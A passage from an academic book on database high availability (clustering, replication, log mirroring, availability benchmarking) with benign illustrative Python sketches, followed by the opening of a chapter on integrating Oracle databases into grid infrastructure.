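        self.stride = cluster_size         # stride = number of nodes in the cluster

    def new_key(self):
        key = self.next_key
        self.next_key += self.stride
        return key

node0, node1 = NodeKeyGenerator(0, 2), NodeKeyGenerator(1, 2)
print([node0.new_key() for _ in range(3)])   # [0, 2, 4]
print([node1.new_key() for _ in range(3)])   # [1, 3, 5]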
• Shared-nothing (federated database) cluster database architecture: The shared nothing (federated database) architecture is a logical unification of distinct databases running on independent servers, sharing no resources, and connected by a local area network (LAN). Thus, a federated database is a distributed database (Buch & Cheevers, 2002). Database replication is used to maintain the same copy of the database content across the nodes in the cluster; replication helps a slave node maintain a duplicate copy of the data from the master node of the cluster.
Database files are partitioned among the instances running on the nodes of a multi-computer system. Each instance or node has ownership of a distinct subset of the data, and all access to this data is performed exclusively by this owning instance. In other words, a shared nothing system
uses a partitioned or restricted access scheme to divide the work among multiple processing nodes. A transaction executing on a given node must send messages to other nodes that own the data being accessed. It must also coordinate the work done on the other nodes to perform the required read/ write activities. Such messaging is commonly known as function shipping. However, shared nothing databases are fundamentally different from distributed databases in that they operate one physical database using one data dictionary (Chandrasekaran & Kehoe, 2003). For both the DBA as well as the application developer, there is a clear distinction between local data, which is on the disk attached to a particular server, and the remote data, which is owned by another server in the federated database. Applications see a logical single view of the data through UNION ALL views and distributed SQL (Microsoft calls this technology Distributed Partitioned Views DPVs) (Otey & Otey, 2005).
The DPV is constructed differently at each node: it must explicitly consider which partitions are local and which are remote. Figure 2 shows the overall structure of the shared-nothing database cluster architecture.
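To make the shape of such a view concrete, the sketch below builds the SQL text of a UNION ALL partitioned view from Python. The server, schema, table, and partition boundaries are invented, and the exact linked-server syntax and constraint requirements vary by product, so this is only an illustration of why the view differs from node to node.

# Illustrative UNION ALL distributed partitioned view; all names are hypothetical.
MEMBER_TABLES = [
    ("Node1", "Customers_Range1"),     # e.g., CustomerID below 3,000,000
    ("Node2", "Customers_Range2"),     # e.g., CustomerID 3,000,000 to 5,999,999
    ("Node3", "Customers_Range3"),     # e.g., CustomerID 6,000,000 and above
]

def build_partitioned_view(local_server):
    """Build the view text as seen from `local_server`: the local partition is
    referenced directly, remote partitions through their owning server."""
    selects = []
    for server, table in MEMBER_TABLES:
        qualified = table if server == local_server else f"{server}.sales.dbo.{table}"
        selects.append(f"SELECT * FROM {qualified}")
    return "CREATE VIEW Customers AS\n  " + "\n  UNION ALL\n  ".join(selects)

print(build_partitioned_view("Node1"))   # differs from the view created on Node2 or Node3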
Shared Disk vs. Shared-Nothing Storage

This section demonstrates the main implementation differences between the shared-disk and shared-nothing storage approaches. The discussion focuses on application development and database high availability concerns.
• Application development: Generally, database clusters appear just like a regular database, which means there are no additional constraints on the application developer. An application, even a complex OLTP application built for a Symmetric Multiprocessing (SMP) platform, runs with no modification on a shared-disk cluster. The single database image, with no data partitioning, carries over from the SMP to the cluster.
In contrast, federated databases do not have a single database image; they are multiple independent databases. Data must either be distributed across participating databases (for large, frequently updated transaction tables) or replicated (for reference data tables that can be accessed equally from every node). Dividing data entities across databases requires creating distributed partition views, which are distinct on every node.
• High availability: Before going into details of the availability framework for cluster systems, it seems valuable to understand the differences between availability within a single node and within a cluster. In a single node, database system availability refers to the ability to survive various application
and operation failures within the database instance. In the worst case, the failure of the node itself, availability refers to the ability to recover the database to a transaction-consistent state as fast as possible. A cluster system, aside from handling the failure scenarios of a single node, needs to handle failure scenarios associated with a node, a group of nodes, or a network, while providing the required performance. A cluster database builds on top of the fault-tolerant capabilities of the single-instance database and enhances the database server to handle failure scenarios unique to a cluster system.

Another main advantage of the cluster architecture is the inherent fault tolerance provided by multiple nodes. Since the physical nodes run independently, the failure of one or more nodes will not affect the other nodes in the cluster. In the extreme case, a cluster system can still be available even when only one node survives, making a cluster-based system highly available. This architecture also allows a group of nodes to be taken off-line for maintenance while the rest of the cluster continues to provide services online.

When a node in a shared-disk cluster fails, all data remains accessible to the other nodes. In-flight transactions spanning nodes are rolled back; thus, no data remains locked as a result of the failure. In most shared-disk database cluster offerings, recovery after node failure is automatic: after detecting the node failure, the cluster is automatically reconfigured and the same roll-forward/roll-back recovery processes that work in the SMP environment are applied. Another benefit of the shared disk approach is that it provides unmatched levels of fault tolerance, with all data remaining accessible even if there is only one surviving node. If a node in the shared disk cluster fails, the system dynamically redistributes the workload among all the surviving cluster nodes. This ensures uninterrupted service and balanced cluster-wide resource utilization.
On the other hand, data in federated databases is divided across databases, and each database is owned by a different node. The only way to access data owned by a node is to request the data from that node and have the node service the request. Thus, when the node fails, the data that it owns becomes unavailable, and the entire system becomes unavailable as well. Also, any in-flight distributed transactions controlled by that node might have locked data on other nodes; therefore, recovering from node failures requires additional work in resolving these in-flight transactions.

As instances of recently-provided commercial database clustering solutions, Oracle Real Application Clusters has started to address cluster architectures using shared storage systems such as a SAN (Storage Area Network). Sybase offered Adaptive Server Enterprise with efficient auto-failover capability. The IBM DB2 Integrated Cluster Environment also uses a shared storage network to achieve both fault tolerance and performance scalability. Open-source solutions for database clustering have been database-specific. MySQL replication uses a master-slave mechanism as a solution offered by a third-party company with limited support for transactions and scalability (Cecchet et al., 2004). PostgreSQL does not have a database clustering option, although some experiments have been reported using partial replication. These extensions to existing database engines often require applications to use additional APIs to benefit from the clustering features.
Database Replication

In many Internet applications, a large number of geographically dispersed users may routinely query and update the same database. In this environment, the location of the data can have a significant impact on application response time and availability. A centralized approach manages only one copy of the database. This approach is simple, since conflicting views between replicas are not possible, but it suffers from two major drawbacks (Amir, Danilov, & Miskin-Amir, 2002):
• Performance problems due to high server load or high communication latency for remote clients
• Availability problems caused by server downtime or lack of connectivity; clients in portions of the network that are temporarily disconnected from the server cannot be serviced
Figure 3. Database replication overall structure (a primary database server feeds a replicator, which performs an initial synchronization by snapshot and then forwards new transactions to the secondary database servers)
The server load and server failure problems can be addressed by replicating the database servers to form a cluster of peer servers that coordinate updates. If the primary server fails, applications can switch to the replicated copy of the data and continue operations. Database replication is different from file replication, which essentially copies files. Database-replication products log selected database transactions to a set of internal replication-management tables. The software then periodically checks these tables for updated data and moves the data from the source to the target systems while guaranteeing data coherency and consistency. Many database-replication products even have built-in tools to allow updating the primary database with any changes that users made to the backup database while the primary database was offline. Figure 3 shows the main components of the database replication environment. The database replication process is usually carried out by three primary components:
• Primary database server (Publisher): The source of the data being replicated;
• Secondary database server (Subscriber): The destination of the replicated data; there can be one or more Subscribers; and
• Replicator: This handles sending the data from the Publisher to the Subscriber(s).
Database replication uses a snapshot of the source database to initially synchronize the databases at the publisher and the subscriber. As transactions are committed at the publisher side, they are captured and sent to the subscriber(s). Transactional replication is generally not designed for high availability: the process of promoting the secondary server to assume the role of the primary server is manual, not automatic. In addition, returning the primary server to its original role after a failure requires a complete database restoration.
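A minimal sketch of this publish/subscribe flow is shown below, using SQLite in-memory databases as stand-ins for the publisher and a subscriber. The replication-management table (repl_log) and its columns are invented for illustration; commercial replication products maintain their own internal tables and metadata.

# Hypothetical replicator: poll the publisher's replication-management table for
# newly committed changes and apply them, in order, at each subscriber.
import sqlite3

def pending_changes(publisher, after_seq):
    """Read committed changes recorded after sequence number `after_seq`."""
    return publisher.execute(
        "SELECT seq, sql_text FROM repl_log WHERE seq > ? ORDER BY seq",
        (after_seq,)).fetchall()

def replicate_once(publisher, subscribers, progress):
    """One polling pass; `progress` remembers each subscriber's last applied change."""
    for name, sub in subscribers.items():
        for seq, sql_text in pending_changes(publisher, progress.get(name, 0)):
            sub.execute(sql_text)
            progress[name] = seq
        sub.commit()

# Demo with in-memory databases standing in for real servers.
publisher = sqlite3.connect(":memory:")
publisher.execute("CREATE TABLE repl_log (seq INTEGER PRIMARY KEY, sql_text TEXT)")
publisher.execute("INSERT INTO repl_log VALUES (1, 'CREATE TABLE t (x INTEGER)')")
publisher.execute("INSERT INTO repl_log VALUES (2, 'INSERT INTO t VALUES (42)')")
subscribers = {"subscriber1": sqlite3.connect(":memory:")}
progress = {}
replicate_once(publisher, subscribers, progress)   # run continuously or on a schedule
print(subscribers["subscriber1"].execute("SELECT * FROM t").fetchall())   # [(42,)]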
Database Log Mirroring

Database mirroring is another option that enables database-level failover against unplanned downtime caused by server or database failures.
In the event that the primary database fails, database mirroring enables a second standby database server to be almost instantly available with zero data loss. The secondary database is always updated with the current transaction being processed on the primary database server, and the impact of running database mirroring on transaction throughput is minimal. Unlike clustering, which works at the server level, database mirroring is implemented at the database level. Database mirroring provides nearly instant failover, taking only a few seconds, while clustering typically has longer failover times. Database mirroring provides added protection against disk failures, as there is no shared quorum disk as there is in a clustering solution. And unlike clustering, which requires specific hardware configurations, database mirroring works with all standard hardware that supports most of today's DBMS systems.

Figure 4 demonstrates an overview of how database mirroring works. Database mirroring is implemented using three systems: the primary server, the secondary server, and the observer. The primary database server usually provides the database services; by default, all incoming client connections are directed to the primary server. The job of the secondary server is to maintain a copy of the primary server's mirrored database. The secondary server is not restricted to just providing backup services; other databases on the secondary server can be actively supporting other, unrelated applications. The observer essentially acts as an independent third party with the responsibility of determining which system will assume the role of the primary server.

The strategy applied in database mirroring is usually to send transaction logs between the primary and secondary servers, which in effect makes database mirroring a real-time log shipping application. When a client system writes a transaction to the primary server, that request is written to the primary server's log file before it is
written into the data file. That transaction record then gets sent to the secondary server, where it gets written to the secondary server's transaction log. After the secondary server has written the record to its log, it sends an acknowledgement to the primary server. This lets both systems know that the record has been received and that the same data now exists in each server's log file. In the case of a commit operation, the primary server waits until it receives an acknowledgement from the mirroring server before it sends its response back to the client saying that the operation is completed. The secondary server should be in a state of continuous recovery to keep its data files up-to-date with the incoming transaction log data. To facilitate high availability for client applications, database mirroring works in conjunction with the Transparent Client Redirection (TCR) layer, which enables end-user systems to be automatically redirected to the secondary server in the event that the database on the primary server becomes unavailable.
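The commit sequence just described (harden the record in the primary's log, ship it to the mirror, wait for the acknowledgement, and only then confirm the commit to the client) is sketched below. The classes illustrate the ordering of the protocol only and are not any vendor's mirroring implementation.

# Sketch of a mirrored commit: log locally, ship the record, wait for the ack,
# then apply the change and reply to the client.
class MirrorServer:
    def __init__(self):
        self.log, self.data = [], []

    def receive_log_record(self, record):
        self.log.append(record)            # harden the record in the mirror's log
        return True                        # acknowledgement back to the primary

    def redo(self):
        """Continuous recovery: roll the shipped log forward into the data files."""
        self.data.extend(self.log[len(self.data):])

class PrimaryServer:
    def __init__(self, mirror):
        self.mirror = mirror
        self.log, self.data = [], []

    def commit(self, record):
        self.log.append(record)                          # 1. write to the local log first
        if not self.mirror.receive_log_record(record):   # 2. ship the record and wait
            raise RuntimeError("mirror did not acknowledge; commit cannot complete")
        self.data.append(record)                         # 3. write into the data file
        return "committed"                               # 4. acknowledge the client

mirror = MirrorServer()
primary = PrimaryServer(mirror)
print(primary.commit({"txn": 1, "op": "INSERT ..."}))
mirror.redo()                                            # the mirror stays in recovery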
AVAILABILITY BENCHMARKING METHODOLOGY
This section illustrates a sample ad-hoc measurement of availability in database management systems, drawing on Brown's work on availability benchmarking of software Redundant Array of Independent Disks (RAID) systems (Brown, 2000; Brown & Patterson, 2000). Brown's technique quantifies availability behavior by examining the variations in delivered quality of service as the system is subjected to targeted fault injection. The availability benchmarking methodology consists of four parts: (i) a set of quality-of-service metrics that measure the test system's behavior; (ii) a generator that produces a realistic workload and provides a way to measure the quality of service under that workload; (iii) a fault-injection environment used to compromise
the test system's availability; and (iv) a reporting methodology based on a graphical representation of the test system's availability behavior. The first step in the availability benchmarking methodology is to select appropriate quality-of-service metrics. These metrics must be chosen so that they reflect degradations in system availability, in the broadest sense of the term. The choice depends on properties of the system being benchmarked. For example, performance degradation would be seen as a decrease in availability in most systems; thus, a performance-based quality-of-service metric is typically an appropriate choice for an availability benchmark. Other metrics can be considered as well, including, for example, the consistency or accuracy of the results delivered by the test system. The second component of the availability-benchmarking methodology, the workload generator, typically takes the form of a traditional performance benchmark. The role of this component is to produce a realistic workload that places the test system under the kind of load conditions it typically experiences in practice. A performance benchmark is used because a great deal of existing work has been carried out to construct realistic workloads in that context. In addition, the methodology requires that the workload generator be able to measure the desired quality-of-service metrics defined in the first step. Since quality of service is typically closely tied to performance, a standard performance benchmark often has the desired measurement capability built in. The availability benchmarking methodology specifies that, while the workload generator is running, the test system should be subjected to targeted faults designed to mimic real-world failure cases that may compromise availability. The third component of the methodology is a fault-injection environment. A key point here is that the injected faults must be chosen to be realistic, either based on a priori knowledge of failure-prone design flaws in some part of the system, or based on historical knowledge of typical
failure cases for the system and the kinds of faults that provoke them. Finally, the last component of the availability-benchmarking methodology specifies the way that results are collected and presented. Essentially, this component defines the procedural aspects of carrying out an availability benchmark. First, the system is run under the generated workload with no faults injected. The quality-of-service values collected during this run are statistically processed to produce a 99% confidence interval demarcating the normal quality-of-service behavior of the system. Then, the experiments are repeated multiple times with different combinations of faults injected during those runs; the methodology specifies both single-fault micro-benchmarks, in which a single fault is injected and the system is left untouched until it stabilizes or crashes, and multiple-fault macro-benchmarks, in which a series of faults designed to mimic a complex real-world scenario is injected, with human intervention allowed for system maintenance purposes. The results of these faulty runs are reported graphically, with quality of service plotted versus time, overlaid with an indication of when the faults were injected and with the 99% confidence interval computed from the normal run.
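As a rough illustration of the reporting step, the sketch below derives a simple 99% band from fault-free quality-of-service samples (assuming, for simplicity, that they are approximately normally distributed) and flags the intervals of a fault-injection run that fall outside it. The throughput numbers are invented, and the band is only a stand-in for the statistical processing used in the original benchmarks.

```python
# Illustrative only: derive a simple 99% band from fault-free QoS samples
# and flag degraded intervals in a faulty run. Data values are invented.
from statistics import mean, stdev

Z_99 = 2.576  # two-sided 99% critical value of the standard normal

def normal_band(samples, z=Z_99):
    m, s = mean(samples), stdev(samples)
    return m - z * s, m + z * s

# Throughput (e.g., transactions per second) measured once per interval.
normal_run = [512, 508, 515, 510, 507, 513, 509, 511]
faulty_run = [510, 506, 430, 295, 301, 480, 505, 509]   # fault injected at t=2

low, high = normal_band(normal_run)
print(f"normal band: {low:.1f} .. {high:.1f}")

for t, qos in enumerate(faulty_run):
    status = "OK" if low <= qos <= high else "DEGRADED"
    print(f"t={t}  qos={qos}  {status}")
```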
CONCLUSION
High availability does not just happen. It is only achieved through strengthening the combination of people, processes, and technology. A plan that focuses purely on technology will never achieve high levels of availability because many of the significant factors that affect availability stem from the interaction of people and processes. Preparing the proper hardware and software platform is only a starting point. From that point on, high availability is the result of good planning and practices in combination with the appropriate technologies.
Designing a cost-effective high-availability environment for an information system requires understanding the causes of outages, the elements that are critical for application execution, and the impact of application outages on the business. With today's technology, there is a range of solutions to support business-critical applications, and although outages may occur, recovery is likely to be quick. If an application outage lasting more than a few minutes would severely impact the business, a clustering solution may be necessary. For constant 24-hour availability, or for applications where outages are life-threatening or directly affect the survival of the business, high-end, fault-tolerant solutions are required. Good operational procedures can make an enormous difference between the theoretical availability and the actual availability of a solution. Finally, an organization must have an enterprise vision for high availability to gain and sustain its competitive advantage. A strategy must be developed to respond effectively to unanticipated events or disruptions. Demands, risks, and opportunities abound, ranging from market fluctuations to employee error and misconduct to earthquakes and terrorism.
REFERENCES
A framework for system high availability. (2000). CA: Intel Corporation, Inc.
Amir, Y., Danilov, C., & Miskin-Amir, M. (2002). Practical wide-area database replication (Tech. Rep. No. CNDS-2002-1). Baltimore: Johns Hopkins University.
Aronoff, E. (2003). Building a 24x7 database. Saint Johns, MI: Quest Software, Inc.
Arora, R. (2005). High availability strategies of an enterprise. Uttar Pradesh, India: TATA Consultancy Services.
Barraza, O. (2002). Achieving 99.9998+% storage uptime and availability. Carlsbad, CA: Dot Hill Systems Corp.
Bauer, M. (2001). Oracle8i Parallel Server Concepts Release 2. Redwood City, CA: Oracle Corporation, A76968-01.
Bender, W. J., & Joshi, A. (2004). High availability technical primer. McLean, VA: Project Performance Corporation.
Brien, M. O. (2000). GoAhead Availability Management Service Technical Brief. Bellevue, WA: GoAhead Software, Inc.
Brown, A. (2000). Availability benchmarking of a database system. Berkeley, CA: University of California at Berkeley, EECS Computer Science Division.
Brown, A., & Patterson, D. A. (2000). Towards availability benchmarks: A case study of software RAID systems. In Proceedings of the 2000 USENIX Annual Technical Conference (pp. 263-276). San Diego, CA.
Buch, V., & Cheevers, S. (2002). Database architecture: Federated vs. clustered. Redwood Shores, CA: Oracle Corporation.
Cai, J., & Leung, S. (2002). Building highly available database servers using Oracle real application clusters. Redwood Shores, CA: Oracle Corporation.
Cecchet, E., Marguerite, J., & Zwaenepoel, W. (2004). C-JDBC: Flexible database clustering middleware. In Proceedings of the USENIX Annual Technical Conference, Freenix Track, Boston (pp. 9-18).
Chandrasekaran, S., & Kehoe, B. (2003). Technical comparison of Oracle real application clusters vs. IBM DB2 UDB ESE. Redwood Shores, CA: Oracle Corporation.
Choosing the right database: The case for OpenBase SQL. (2004). Concord, NH: OpenBase International, Ltd.
DB2operation: The challenge to provide 24x365 availability. (2000). Houston, TX: BMC Software, Inc.
Disaster recovery package for SYBASE adaptive server enterprise. (2004). Dublin, CA: Sybase Inc.
Gribble, S. D., Brewer, E. A., Hellerstein, J. M., & Culler, D. (2000). Scalable, distributed data structures for Internet service construction. In Proceedings of the 4th Symposium on Operating Systems Design and Implementation (OSDI 2000), San Diego, CA (pp. 319-332).
High Availability and More: Achieving a Service Availability™ Solution. (2001). Bellevue, WA: GoAhead Software, Inc.
High availability white paper. (2001). San Jose, CA: BlueArc Corporation.
Klein, D. (1988). Architecting and deploying high-availability solutions. USA: Compaq Computer Corporation, Inc.
Kumar, S. (2005). Oracle Database 10g Release 2 High Availability. Redwood City, CA: Oracle Corporation, Inc.
Lemme, S. (2002). IT managers guide: Maximizing your technology investments in Oracle. Database Trend and Application Magazine.
Lemme, S., & Colby, J. R. (2001). Implementing and managing Oracle databases (1st ed.). New York: PRIMA Publishing.
Low cost high availability clustering for the enterprise. (2004). Burlington, MA: Winchester Systems Inc. and Red Hat Inc.
Lumpkin, G. (2004). Oracle partitioning—a must for data warehouse and OLTP environments. Redwood Shores, CA: Oracle Corporation, Inc.
Otey, M., & Otey, D. (2005). Choosing a database for high availability: An analysis of SQL Server and Oracle. USA: Microsoft Corporation.
Parikh, A. (2004). Trustworthy software. Unpublished master of science dissertation, Stevens Institute of Technology, Castle Point on Hudson, Hoboken.
Providing Open Architecture High Availability Solutions. (2001). Bellevue, WA: GoAhead Software, Inc.
Rosenkrantz, B., & Hill, C. (1999). Highly available embedded computer platforms become reality. Chicago: Motorola Computer Group, Embedded Systems Development.
Russom, P. (2001). Strategies and Sybase solutions for database availability. Waltham, MA: Hurwitz Group Inc.
Saito, Y., Bershad, B. N., & Levy, H. M. (2000). Manageability, availability, and performance in Porcupine: A highly scalable, cluster-based mail service. In Proceedings of the 17th Symposium on Operating Systems Principles (SOSP), Kiawah Island, SC. ACM Transactions on Computer Systems, 18(3), 298-332.
Sauers, B. (1996). Understanding high availability. USA: Hewlett-Packard Company, Inc.
Service availability: A customer-centric approach to availability. (2000). Bellevue, WA: GoAhead Software, Inc.
Singh, H. (2001). Distributed fault-tolerant/high availability systems. Los Angeles, CA: TRILLIUM Digital System, Inc.
Standards for a Service Availability™ Solution. (2002). USA: Demac Associates for Service Availability™ Forum.
Tendulkar, V. S. (2005). MySQL database replication and failover clustering. Mumbai, India: Tata Consultancy Services Ltd.
This work was previously published in An Overview of Knowledge Management, edited by M. Radaideh; H. Al-Ameed, pp. 1-33, copyright 2007 by IGI Publishing (an imprint of IGI Global).
Chapter 6.3
Database Integration in the Grid Infrastructure
Emmanuel Udoh
Indiana University – Purdue University, USA
INTRODUCTION
The capability of the Web to link information over the Internet has popularized computer science with the public. But it is the grid that will enable the public to exploit data storage and computing power over the Internet in a manner analogous to the electric power utility (a ubiquitous commodity). The grid is considered the fifth-generation computing architecture, after client-server and multitier (Kusnetzky & Olofson, 2004), that integrates resources (computers, networks, data archives, instruments, etc.) in an interoperable virtual environment (Berman, Fox, & Hey, 2003). In this vein, grid computing is a new IT infrastructure that allows modular hardware and software to be deployed collectively to solve a problem or rejoined on demand to meet the changing needs of a user. Grid computing is becoming popular in the enterprise world after its origin in the academic and research communities (e.g., SETI@home), where it was successfully used to share resources, store data in petabytes/exabytes, and ultimately lower costs. There are several reasons for the
embrace of enterprise grids. In the nineties, the IT world was confronted with the high cost of maintaining smaller, cheaper, dedicated UNIX and Windows servers. According to Oracle (2005), there was the problem of application silos that led to underutilized hardware resources; monolithic and unwieldy systems that are expensive to maintain and change; and fragmented and disintegrated information that cannot be fully exploited by the enterprise as a whole. Various surveys put the average utilization of servers in a typical enterprise at often much less than 20% (Goyal & Lawande, 2006; Murch, 2004). But with increasingly available cheaper and faster hardware such as server blades, and operating systems like open-source Linux, the IT world embraced grid computing to save money on hardware and software. With the growing importance of grid computing, it is easy to see why many new terms have been coined for it. In the literature and industry, other terms used interchangeably with grid computing are utility computing, computing on demand, N1, hosted computing, adaptive computing, organic
computing, and ubiquitous computing (Goyal & Lawande, 2006; Murch, 2004; Oracle, 2005). The grid is an all-encompassing, 21st-century computing infrastructure (Foster, 2003; Joseph & Fellenstein, 2004) that integrates several areas of computer science and engineering. A database is an important component of the application stack in industry and is increasingly being embedded in the grid infrastructure. This article focuses on the integration of database grids, or grid-accessible databases, in industry, using Oracle products as examples. Vendors like Oracle and IBM are providing grid-enabled databases that are supposed to make enterprise systems unbreakable and highly available. Oracle has been at the forefront of this endeavor with its database products. In recognition of the significant new capabilities required to power grid computing, Oracle has named its new technology products Oracle 10g (g for grid). Oracle provides seamless availability through its database products with features such as streams, transportable tablespaces, data hubs, ultra-search, and real application clusters. Although companies will not want to distribute resources randomly over the Internet, they will embrace enterprise database grids, just as they embraced the Internet in the form of intranets. To the business world, database grids will help achieve high hardware utilization and resource sharing, high availability, flexibility, incrementally scalable low-cost components, and reduced administrative overhead (Kumar & Burleson, 2005; Kusnetzky & Olofson, 2004).
BACKGROUND
Grid technology is still evolving, and databases are increasingly being incorporated into its infrastructure. IBM has contributed immensely to this endeavor with its autonomic and grid computing projects, but Oracle is the clear-cut industry leader in enterprise database grids. Oracle, a member of the Enterprise Grid Alliance (EGA), which promotes tools and standards for enterprise computing, has
been preparing for and targeting the grid market since the Oracle9i release with products like Oracle real application clusters (now morphed into the automatic storage management system). This article will therefore discuss enterprise grid computing in terms of the features available in Oracle 10g database products. The main features that clearly differentiate grid computing from other computing architectures, such as client-server or multitier, are virtualization and provisioning. Virtualization creates a logical view, or abstraction, that allows resources (e.g., data, computing power, storage capacity, and other resources) to be pooled together for consumption by applications, while provisioning determines how to meet the specific needs of consumers on demand. As consumers request resources through the virtualization layer (which breaks the hard-coded connection between providers and consumers) (Oracle, 2005), provisioning guarantees that resources are allocated for the request. To achieve these objectives, a grid implements a layered architecture, as depicted in Figure 1a. Mirroring the generalized grid architecture, the Oracle grid builds a stack of its software in a virtual environment, as shown in Figure 1b. The bottom layer hosts the storage units, such as a storage area network (SAN), while the next horizontal layer contains the infrastructure, that is, the hardware and software that create a data storage and program execution environment (infrastructure grid). The next layer, the application server, contains the program logic and flow that define specific business processes (application grid). The topmost layer (information grid) hosts applications such as user applications, enterprise resource planning, and portal software that can be accessed over the network without the application being architected to support the device or network. This virtualized environment has a unified management structure as well as an infrastructure for security.
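To make the roles of virtualization and provisioning concrete, the toy Python sketch below pools several servers behind one logical interface and allocates capacity on demand. It is purely conceptual and is not modeled on any vendor's grid software; the server names and CPU units are invented.

```python
# Toy model of virtualization (one logical pool over many servers) and
# provisioning (allocating capacity on demand). Purely conceptual.

class ResourcePool:
    def __init__(self, servers):
        # servers: {name: free CPU units}; consumers never see these names
        self.servers = dict(servers)

    def capacity(self):
        return sum(self.servers.values())

    def provision(self, consumer, cpus_needed):
        """Grant the request from whichever servers have spare capacity."""
        if cpus_needed > self.capacity():
            raise RuntimeError(f"cannot provision {cpus_needed} CPUs for {consumer}")
        grant = {}
        for name, free in self.servers.items():
            if cpus_needed == 0:
                break
            take = min(free, cpus_needed)
            if take:
                self.servers[name] -= take
                grant[name] = take
                cpus_needed -= take
        return grant  # the consumer only sees that the request was satisfied


pool = ResourcePool({"blade-1": 4, "blade-2": 4, "blade-3": 2})
print(pool.provision("payroll-app", 5))   # e.g. {'blade-1': 4, 'blade-2': 1}
print(pool.capacity())                    # 5 CPU units left in the pool
```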
As depicted in Figure 1b, Oracle 10g software stack, which is configured to self-manage, acts as a single computing resource to the user even in a geographically distributed environment. This allows organizations to protect and optimize their investment in hardware and software and also access newer system features in a more reliable, powerful and scalable environment. To keep this unified structure manageable and also eliminate the application silo model, Oracle enterprise manager has a grid control that monitors, provisions, clones and automates even in heterogeneous environments (Khilani, 2005).
MAIN FOCUS
The evolving enterprise database grid brings substantial benefits to the industry but poses a major challenge in integration and adoption. With yearly global business volume in excess of $10 billion, databases are critical components of the enterprise application stack. The existing database infrastructures in companies are aggregates of many years of investment in a wide range of interfaces and tools for performance and security. Given all the hype about grids, it is natural that their adoption will be resisted by employees who are unwilling to change existing processes and technology. Researchers believe that building grid-enabled database infrastructures from
scratch is both unrealistic and a waste of effort and resources (Watson, 2003). Instead, existing database management systems should be integrated into the grid in an incremental manner, absorbing the existing investments without being disruptive. Oracle’s grid-enabled database takes cognizance of this reality, and hence this article focuses on database grid integration and adoption vis-a-vis Oracle grid products. At the department of computer science (CS), Indiana University–Purdue University, Fort Wayne, an Oracle database grid was introduced to aid the administration of the database program (for research and education). Experience from this program supports these transitioning steps for the integration and adoption of an enterprise database grid: identification, standardization, consolidation and automation.
Identification
Organizations have different IT infrastructures that may influence decisions to integrate their enterprises into database grids. One approach is to identify a suitable activity, or sweet spot, that will facilitate the adoption of the grid, not necessarily in one big swoop but in a small-scale and incremental manner. Goyal and Lawande (2006) give some characteristics of a sweet spot, such as a task with a compelling use case that has broad acceptance in a company, or a task with measurable goals and
Figure 1. Structure of generalized grid and Oracle database grid: (a) the generalized grid stacks virtual grid applications, virtual specific grid middleware and tools, a virtual infrastructure layer, and virtual global resources; (b) the Oracle database grid stacks applications (SCM, ERP), application servers, database servers, and storage disks, with management, security, and virtualization spanning all layers
Figure 2. Oracle grid control at the CS department, Fort Wayne
benefits on a small scale that could be executed within a realistic time frame. For instance, organizations may have periodic acquisition plans for software and hardware, a problem monitoring IT infrastructure, resource allocation or desire for improvement of business flows. In such situations, enterprises can acquire new, low cost modular servers during the cycle of hardware acquisition for database and application servers, deploy grid control as a solution for management constraints, or apply provisioning technologies such as transportable tablespaces and streams for resource allocation problems. At the CS department, Fort Wayne, we were confronted with the problem of managing our
Oracle servers (database, application server, storage, and instrument) due to the absence of a DBA. This was a sweet spot that led us to introduce Oracle database grid products. Oracle database grid control (ODGC; Figure 2) solved this management constraint based on the philosophy of managing many as one (Khilani, 2005; Kumar & Burleson, 2005). ODGC adopts a holistic management view to monitor diverse Oracle products and also to provision, clone, and automate jobs, providing alerts and warnings even in heterogeneous environments. Its self-monitoring features ensure that critical components of grid control are always available and functional (Khilani, 2005; Kumar & Burleson, 2005). ODGC is
bundled with a grid control management console (client), a management service (middleware), and a management agent (back end) in a three-tiered architecture. It can monitor any node (target) on which a management agent collects host- and database-related statistics. Adding a new system to the management target list involves simply installing the management agent on that system; thus, as an IT department grows, more servers can easily be added for load balancing. In addition to the centralized management structure, grid control provides a unified security/identity management interface based on the single sign-on technique, which allows a user to log on once to a network and then access multiple applications with a single password.
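The three-tier arrangement can be pictured with the schematic sketch below, in which an agent installed on each node gathers statistics and pushes them to a central management service that a console can query. It is a generic illustration of the console/service/agent split, with invented names and metrics; it does not reproduce Oracle's actual agent protocol.

```python
# Generic illustration of the console / management service / agent split.
# This is not Oracle's protocol; names and metrics are invented.
import random
import time

class ManagementService:
    """Middle tier: keeps the latest metrics for every registered target."""
    def __init__(self):
        self.targets = {}

    def register(self, target_name):
        self.targets[target_name] = {}

    def report(self, target_name, metrics):
        self.targets[target_name] = metrics

    def console_view(self):
        # what a console (client tier) would render
        return {name: m.get("cpu_pct", "n/a") for name, m in self.targets.items()}


class ManagementAgent:
    """Back end: installed on each monitored node; collects and pushes stats."""
    def __init__(self, node_name, service):
        self.node_name = node_name
        self.service = service
        service.register(node_name)

    def collect_and_report(self):
        metrics = {"cpu_pct": random.randint(5, 95),   # stand-in for real probes
                   "timestamp": time.time()}
        self.service.report(self.node_name, metrics)


service = ManagementService()
agents = [ManagementAgent(n, service) for n in ("db-node-1", "db-node-2")]
for agent in agents:            # adding a node is just installing another agent
    agent.collect_and_report()
print(service.console_view())
```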
Standardization
In an attempt to achieve high productivity, organizations normally invest in the best available technologies and processes, regardless of the interoperability of the systems. This practice has caused the IT world to make huge financial outlays for interoperability (Chrabakh & Wolski, 2006). The grid approach supports using interoperable products as a way to curb the variability and complexity prevalent in current data centers. According to Goyal and Lawande (2006), one way to achieve technology standardization is to limit the number of vendors and products, favoring those that support industry standards for interoperability. This approach reduces the resources needed for deployment and testing of single product lines and paves the way for easier future consolidation. While technology standardization focuses on reducing heterogeneous hardware and software (vendors and products), process standardization is geared toward the architecture for development, deployment, and management. Process standardization reduces the variability of a system life cycle and the associated errors. In this vein, IT process standards such as ITIL could be adopted as a guide. This approach ensures that proven best management
practice is observed in the life cycle of systems, thus streamlining activities and reducing cost. To achieve standardization of the hardware and software at the CS department, Fort Wayne, the Oracle grid products are only operated on Linux servers (much cheaper than symmetric multiprocessor–SMP) and Linux operating systems (Red Hat). This ensures uniform maintenance of the hardware and software resources, thereby easing administration.
Consolidation
